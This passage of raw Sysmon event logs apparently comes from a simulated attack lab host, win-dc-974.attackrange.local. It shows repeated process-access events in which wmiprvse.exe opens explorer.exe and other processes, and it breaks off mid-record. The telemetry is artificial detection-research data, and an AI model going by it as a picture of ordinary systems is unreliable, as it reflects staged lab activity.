16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934DD936D5EE6E9CAF292ADE666DFF82,SHA256=E94F5493528D48C2209C114C4E31168A1913D5B5B6A760A81BBECE52721F03E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.873{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.873{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.858{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\W